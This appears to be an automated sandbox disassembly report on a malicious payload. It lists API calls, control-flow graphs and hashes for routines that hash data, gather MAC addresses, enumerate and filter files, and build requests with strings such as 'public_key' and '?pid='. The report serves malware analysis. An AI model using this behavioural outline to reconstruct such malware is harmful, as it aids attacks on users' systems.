                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 00E3EBB6
                                                                                                  • _strstr.LIBCMT ref: 00E3EBDA
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E3EC00
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E3EC24
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 00E3EC32
                                                                                                  • lstrlenW.KERNEL32(?), ref: 00E3EC3E
                                                                                                  • lstrlenA.KERNEL32(","id":"), ref: 00E3EC51
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 00E3EC6D
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 00E3EC7F
                                                                                                  • lstrlenA.KERNEL32(?), ref: 00E3EC93
                                                                                                  • lstrlenA.KERNEL32(00000022), ref: 00E3ECB3
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 00E3ED2A
                                                                                                  • lstrlenA.KERNEL32(?), ref: 00E3ED4B
                                                                                                  • _malloc.LIBCMT ref: 00E3ED55
                                                                                                  • _memset.LIBCMT ref: 00E3ED63
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 00E3ED7D
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 00E3ED85
                                                                                                  • lstrlenW.KERNEL32(?), ref: 00E3EDA3
                                                                                                  • lstrlenW.KERNEL32(?), ref: 00E3EDAE
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E3EDD3
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E3EDF7
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 00E3EE05
                                                                                                  • _free.LIBCMT ref: 00E3EE15
                                                                                                  • _free.LIBCMT ref: 00E3EE22
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 00E3EF61
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 00E3EFBF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                  • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                  • API String ID: 704684250-3586605218
                                                                                                  • Opcode ID: d6705210a1d16757d82f50f5ea810820b54ddd3ae42483844790b6bc4facf836
                                                                                                  • Instruction ID: d047fa4756129e4560ced7805306d605947c40767340c3e4cf0428f05d76c447
                                                                                                  • Opcode Fuzzy Hash: d6705210a1d16757d82f50f5ea810820b54ddd3ae42483844790b6bc4facf836
                                                                                                  • Instruction Fuzzy Hash: B742E371508385AFD720DF24DC49B9BBBE8BF85304F14191CF585AB292DB74E609CBA2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00E31010
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00E31026
                                                                                                    • Part of subcall function 00E50ECA: RaiseException.KERNEL32(?,?,00E6F26B,?,?,00000000,?,?,?,?,00E6F26B,?,00F281FC,?), ref: 00E50F1F
                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00E3103B
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00E31051
                                                                                                  • lstrlenA.KERNEL32(?,00000000), ref: 00E31059
                                                                                                  • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00E31064
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00E3107A
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00E31099
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00E310AB
                                                                                                  • _memset.LIBCMT ref: 00E310CA
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00E310DE
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00E310F0
                                                                                                  • _malloc.LIBCMT ref: 00E31100
                                                                                                  • _memset.LIBCMT ref: 00E3110B
                                                                                                  • _sprintf.LIBCMT ref: 00E3112E
                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00E3113C
                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 00E31154
                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00E3115F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                  • String ID: %.2X
                                                                                                  • API String ID: 2451520719-213608013
                                                                                                  • Opcode ID: deb24bd5d04e4db1cba3fdf1bcd437a194176c0c82466c837b89f3327bbdd1c7
                                                                                                  • Instruction ID: 67683ad79a0f8e1524a580915936297a10e771f3ab67110fdeaba7755b66fd59
                                                                                                  • Opcode Fuzzy Hash: deb24bd5d04e4db1cba3fdf1bcd437a194176c0c82466c837b89f3327bbdd1c7
                                                                                                  • Instruction Fuzzy Hash: EB518171D40259ABDF10DBA0DC46FEFBBB8FF04744F201025FA00B6180EB75AA058BA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00E31AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E31ACA
                                                                                                    • Part of subcall function 00E31AB0: DispatchMessageW.USER32(?), ref: 00E31AE0
                                                                                                    • Part of subcall function 00E31AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E31AEE
                                                                                                  • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 00E2F900
                                                                                                  • _memmove.LIBCMT ref: 00E2F9EA
                                                                                                  • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 00E2FA51
                                                                                                  • _memmove.LIBCMT ref: 00E2FADA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                  • String ID:
                                                                                                  • API String ID: 273148273-0
                                                                                                  • Opcode ID: 24de3ca49808c1c26444c75b4301fabdfd0129604fd4c8999a8c5a036d6744f5
                                                                                                  • Instruction ID: 71f32d5289c6eacbd4af8ad5f6bb2c99037dd26a29ba7ea978d38f473fec880f
                                                                                                  • Opcode Fuzzy Hash: 24de3ca49808c1c26444c75b4301fabdfd0129604fd4c8999a8c5a036d6744f5
                                                                                                  • Instruction Fuzzy Hash: 01527A71D00218DADF14DFA8E899BDEBBF5BF04308F209179E419B7251E735AA48CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1515 e2e870-e2e8d6 call e356d0 CryptAcquireContextW 1518 e2e8d8-e2e8e4 call e50eca 1515->1518 1519 e2e8e9-e2e901 CryptCreateHash 1515->1519 1518->1519 1521 e2e903-e2e90f call e50eca 1519->1521 1522 e2e914-e2e930 CryptHashData 1519->1522 1521->1522 1524 e2e932-e2e93e call e50eca 1522->1524 1525 e2e943-e2e961 CryptGetHashParam 1522->1525 1524->1525 1527 e2e963-e2e96f call e50eca 1525->1527 1528 e2e974-e2e9a6 call e40be4 call e4b420 CryptGetHashParam 1525->1528 1527->1528 1534 e2e9a8-e2e9b4 call e50eca 1528->1534 1535 e2e9b9-e2e9bb 1528->1535 1534->1535 1537 e2e9c0-e2e9c3 1535->1537 1538 e2ea10-e2ea31 call e42110 CryptDestroyHash CryptReleaseContext 1537->1538 1539 e2e9c5-e2e9df call e404a6 1537->1539 1544 e2ea33-e2ea3b call e42587 1538->1544 1545 e2ea3e-e2ea50 1538->1545 1546 e2e9f2-e2e9f5 1539->1546 1547 e2e9e1-e2e9f0 call e33ea0 1539->1547 1544->1545 1548 e2e9f8-e2e9fd 1546->1548 1547->1537 1548->1548 1551 e2e9ff-e2ea0e call e33ea0 1548->1551 1551->1537
                                                                                                  APIs
                                                                                                  • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00F1FCA4,00000000,00000000), ref: 00E2E8CE
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00E2E8E4
                                                                                                    • Part of subcall function 00E50ECA: RaiseException.KERNEL32(?,?,00E6F26B,?,?,00000000,?,?,?,?,00E6F26B,?,00F281FC,?), ref: 00E50F1F
                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00E2E8F9
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00E2E90F
                                                                                                  • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 00E2E928
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00E2E93E
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00E2E95D
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00E2E96F
                                                                                                  • _memset.LIBCMT ref: 00E2E98E
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00E2E9A2
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00E2E9B4
                                                                                                  • _sprintf.LIBCMT ref: 00E2E9D3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                  • String ID: %.2X
                                                                                                  • API String ID: 1084002244-213608013
                                                                                                  • Opcode ID: 32e919e9c816acca7e963a133c44e4c0326e0d9afff70f1e5c9bf069044f393a
                                                                                                  • Instruction ID: 29219cf4408d0a545817be3bf06ed0b40112c0e8b0883297a144eff5a04e9ae6
                                                                                                  • Opcode Fuzzy Hash: 32e919e9c816acca7e963a133c44e4c0326e0d9afff70f1e5c9bf069044f393a
                                                                                                  • Instruction Fuzzy Hash: 47518571D40219ABDF11DFA1EC47FEEBBB8EB04704F241426F901B6281D775AA058BA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1556 e2eaa0-e2eb09 call e356d0 CryptAcquireContextW 1559 e2eb0b-e2eb17 call e50eca 1556->1559 1560 e2eb1c-e2eb34 CryptCreateHash 1556->1560 1559->1560 1562 e2eb36-e2eb42 call e50eca 1560->1562 1563 e2eb47-e2eb56 CryptHashData 1560->1563 1562->1563 1565 e2eb58-e2eb64 call e50eca 1563->1565 1566 e2eb69-e2eb87 CryptGetHashParam 1563->1566 1565->1566 1568 e2eb9a-e2ebcc call e40be4 call e4b420 CryptGetHashParam 1566->1568 1569 e2eb89-e2eb95 call e50eca 1566->1569 1575 e2ebce-e2ebda call e50eca 1568->1575 1576 e2ebdf 1568->1576 1569->1568 1575->1576 1578 e2ebe1-e2ebe4 1576->1578 1579 e2ebe6-e2ec00 call e404a6 1578->1579 1580 e2ec38-e2ec67 call e42110 CryptDestroyHash CryptReleaseContext 1578->1580 1585 e2ec02-e2ec11 call e33ea0 1579->1585 1586 e2ec13-e2ec19 1579->1586 1585->1578 1587 e2ec20-e2ec25 1586->1587 1587->1587 1589 e2ec27-e2ec36 call e33ea0 1587->1589 1589->1578
                                                                                                  APIs
                                                                                                  • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00F1FCA4,00000000,00000000,00000000,?), ref: 00E2EB01
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00E2EB17
                                                                                                    • Part of subcall function 00E50ECA: RaiseException.KERNEL32(?,?,00E6F26B,?,?,00000000,?,?,?,?,00E6F26B,?,00F281FC,?), ref: 00E50F1F
                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00E2EB2C
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00E2EB42
                                                                                                  • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 00E2EB4E
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00E2EB64
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00E2EB83
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00E2EB95
                                                                                                  • _memset.LIBCMT ref: 00E2EBB4
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00E2EBC8
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00E2EBDA
                                                                                                  • _sprintf.LIBCMT ref: 00E2EBF4
                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 00E2EC44
                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00E2EC4F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                  • String ID: %.2X
                                                                                                  • API String ID: 1637485200-213608013
                                                                                                  • Opcode ID: a57926a71418b41c6aedc0b4ba769f21bec224079a6f63785b986f20a06f6a08
                                                                                                  • Instruction ID: f4edfe54bbe5da65efa5de6f42e96aa1c31d95736cedd5f951cc6065bdbf8082
                                                                                                  • Opcode Fuzzy Hash: a57926a71418b41c6aedc0b4ba769f21bec224079a6f63785b986f20a06f6a08
                                                                                                  • Instruction Fuzzy Hash: ED519571D40259ABDF10DBA1DC47FEEBBB8FB04704F241429FA01B7281DB74AA058BA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1593 e2e670-e2e697 call e40c62 * 2 1598 e2e6b4-e2e6c2 GetAdaptersInfo 1593->1598 1599 e2e699-e2e6b3 call e41f2d call e40bed 1593->1599 1601 e2e6c4-e2e6d9 call e40bed call e40c62 1598->1601 1602 e2e6db-e2e6e8 GetAdaptersInfo 1598->1602 1601->1599 1601->1602 1603 e2e744-e2e754 call e40bed 1602->1603 1604 e2e6ea-e2e73c call e404a6 call e41f2d * 2 1602->1604 1619 e2e741 1604->1619 1619->1603
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 00E2E67F
                                                                                                    • Part of subcall function 00E40C62: __FF_MSGBANNER.LIBCMT ref: 00E40C79
                                                                                                    • Part of subcall function 00E40C62: __NMSG_WRITE.LIBCMT ref: 00E40C80
                                                                                                    • Part of subcall function 00E40C62: RtlAllocateHeap.NTDLL(00970000,00000000,00000001,00000000,00000000,00000000,?,00E48CF4,00000000,00000000,00000000,00000000,?,00E48BE1,00000018,00F27BD0), ref: 00E40CA5
                                                                                                  • _malloc.LIBCMT ref: 00E2E68B
                                                                                                  • _wprintf.LIBCMT ref: 00E2E69E
                                                                                                  • _free.LIBCMT ref: 00E2E6A4
                                                                                                    • Part of subcall function 00E40BED: HeapFree.KERNEL32(00000000,00000000,?,00E4507F,00000000,00E4500D,?,00E43F7C,?,00E3E6CC,00000000), ref: 00E40C01
                                                                                                    • Part of subcall function 00E40BED: GetLastError.KERNEL32(00000000,?,00E4507F,00000000,00E4500D,?,00E43F7C,?,00E3E6CC,00000000,?,?,?,?,?,00EEB3EC), ref: 00E40C13
                                                                                                  • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00E2E6B9
                                                                                                  • _free.LIBCMT ref: 00E2E6C5
                                                                                                  • _malloc.LIBCMT ref: 00E2E6CD
                                                                                                  • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00E2E6E0
                                                                                                  • _sprintf.LIBCMT ref: 00E2E720
                                                                                                  • _wprintf.LIBCMT ref: 00E2E732
                                                                                                  • _wprintf.LIBCMT ref: 00E2E73C
                                                                                                  • _free.LIBCMT ref: 00E2E745
                                                                                                  Strings
                                                                                                  • Error allocating memory needed to call GetAdaptersinfo, xrefs: 00E2E699
                                                                                                  • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 00E2E71A
                                                                                                  • Address: %s, mac: %s, xrefs: 00E2E72D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                  • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                  • API String ID: 3901070236-1604013687
                                                                                                  • Opcode ID: 0ce5670b6170f6b3baf6ec76fa001969d3188647ef91672d2cbc335f7f932631
                                                                                                  • Instruction ID: 6382713c8de3255de2618e23ebba3ecf40646a0f4dbba9c2dff32310abf84304
                                                                                                  • Opcode Fuzzy Hash: 0ce5670b6170f6b3baf6ec76fa001969d3188647ef91672d2cbc335f7f932631
                                                                                                  • Instruction Fuzzy Hash: 611106B2A046747AC661A3B57C02EFF76EC8F46711F0401B5FA98F1142EA689A1563B2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1997 e2fb98-e2fb9f 1998 e2fba0-e2fbb9 1997->1998 1998->1998 1999 e2fbbb-e2fbcf 1998->1999 2000 e2fbd3-e2fc02 PathAppendW call e38400 1999->2000 2001 e2fbd1 1999->2001 2004 e2fc04-e2fc0c call e42587 2000->2004 2005 e2fc0f-e2fc29 2000->2005 2001->2000 2004->2005 2007 e2fc2b-e2fc2f 2005->2007 2008 e2fc49-e2fc4c 2005->2008 2010 e2fc31-e2fc47 call e405a0 2007->2010 2011 e2fc4f-e2fc6b PathFileExistsW 2007->2011 2008->2011 2010->2011 2013 e2fcdf-e2fce5 2011->2013 2014 e2fc6d-e2fc86 call e40c62 2011->2014 2016 e2fcf0-e2fd07 call e37140 2013->2016 2017 e2fce7-e2fced call e42587 2013->2017 2024 e2fc8a-e2fc9f lstrcpyW 2014->2024 2025 e2fc88 2014->2025 2026 e2fd0b-e2fd20 FindFirstFileW 2016->2026 2027 e2fd09 2016->2027 2017->2016 2028 e2fca3-e2fcdc lstrcatW call e34690 call e2f0e0 call e40bed 2024->2028 2029 e2fca1 2024->2029 2025->2024 2030 e2fd22-e2fd2d call e42587 2026->2030 2031 e2fd30-e2fd4c 2026->2031 2027->2026 2028->2013 2029->2028 2030->2031 2035 e2fd52-e2fd55 2031->2035 2036 e30072-e30076 2031->2036 2039 e2fd60-e2fd6b 2035->2039 2040 e30086-e300a4 2036->2040 2041 e30078-e30083 call e42587 2036->2041 2045 e2fd70-e2fd76 2039->2045 2042 e300b1-e300c9 2040->2042 2043 e300a6-e300ae call e42587 2040->2043 2041->2040 2050 e300d6-e300ee 2042->2050 2051 e300cb-e300d3 call e42587 2042->2051 2043->2042 2052 e2fd96-e2fd98 2045->2052 2053 e2fd78-e2fd7b 2045->2053 2063 e300f0-e300f8 call e42587 2050->2063 2064 e300fb-e3010b 2050->2064 2051->2050 2060 e2fd9b-e2fd9d 2052->2060 2057 e2fd92-e2fd94 2053->2057 2058 e2fd7d-e2fd85 2053->2058 2057->2060 2058->2052 2062 e2fd87-e2fd90 2058->2062 2065 e30052-e30065 FindNextFileW 2060->2065 2066 e2fda3-e2fdae 2060->2066 2062->2045 2062->2057 2063->2064 2065->2039 2068 e3006b-e3006c FindClose 2065->2068 2069 e2fdb0-e2fdb6 2066->2069 2068->2036 2071 e2fdd6-e2fdd8 2069->2071 2072 e2fdb8-e2fdbb 2069->2072 2075 e2fddb-e2fddd 2071->2075 2073 e2fdd2-e2fdd4 2072->2073 2074 e2fdbd-e2fdc5 2072->2074 2073->2075 2074->2071 2076 e2fdc7-e2fdd0 2074->2076 2075->2065 2077 e2fde3-e2fdea 2075->2077 2076->2069 2076->2073 2078 e2fec2-e2fecc 2077->2078 2079 e2fdf0-e2fe71 call e37140 call e35ae0 call e34690 call e33b70 2077->2079 2080 e2feda-e2fede 2078->2080 2081 e2fece-e2fed5 call e31ab0 2078->2081 2103 e2fe73-e2fe7e call e42587 2079->2103 2104 e2fe81-e2fea9 2079->2104 2080->2065 2085 e2fee4-e2ff13 call e34690 2080->2085 2081->2080 2091 e2ff15-e2ff17 2085->2091 2092 e2ff19-e2ff1f 2085->2092 2094 e2ff31-e2ff6a call e35ae0 PathFindExtensionW 2091->2094 2095 e2ff22-e2ff2b 2092->2095 2101 e2ff9a-e2ffa8 2094->2101 2102 e2ff6c 2094->2102 2095->2095 2096 e2ff2d-e2ff2f 2095->2096 2096->2094 2105 e2ffda-e2ffde 2101->2105 2106 e2ffaa 2101->2106 2109 e2ff70-e2ff74 2102->2109 2103->2104 2104->2065 2108 e2feaf-e2febd call e42587 2104->2108 2115 e2ffe0-e2ffe9 2105->2115 2116 e3003a-e30042 2105->2116 2110 e2ffb0-e2ffb4 2106->2110 2108->2065 2113 e2ff76-e2ff78 2109->2113 2114 e2ff7a 2109->2114 2117 e2ffb6-e2ffb8 2110->2117 2118 e2ffba 2110->2118 2120 e2ff7c-e2ff88 call e41c02 2113->2120 2114->2120 2123 e2ffeb 2115->2123 2124 e2ffed-e2fff9 call e41c02 2115->2124 2121 e30044-e3004c call e42587 2116->2121 2122 e3004f 2116->2122 2125 e2ffbc-e2ffce call e41c02 2117->2125 2118->2125 2134 e2ff93 2120->2134 2135 e2ff8a-e2ff8f 2120->2135 2121->2122 2122->2065 2123->2124 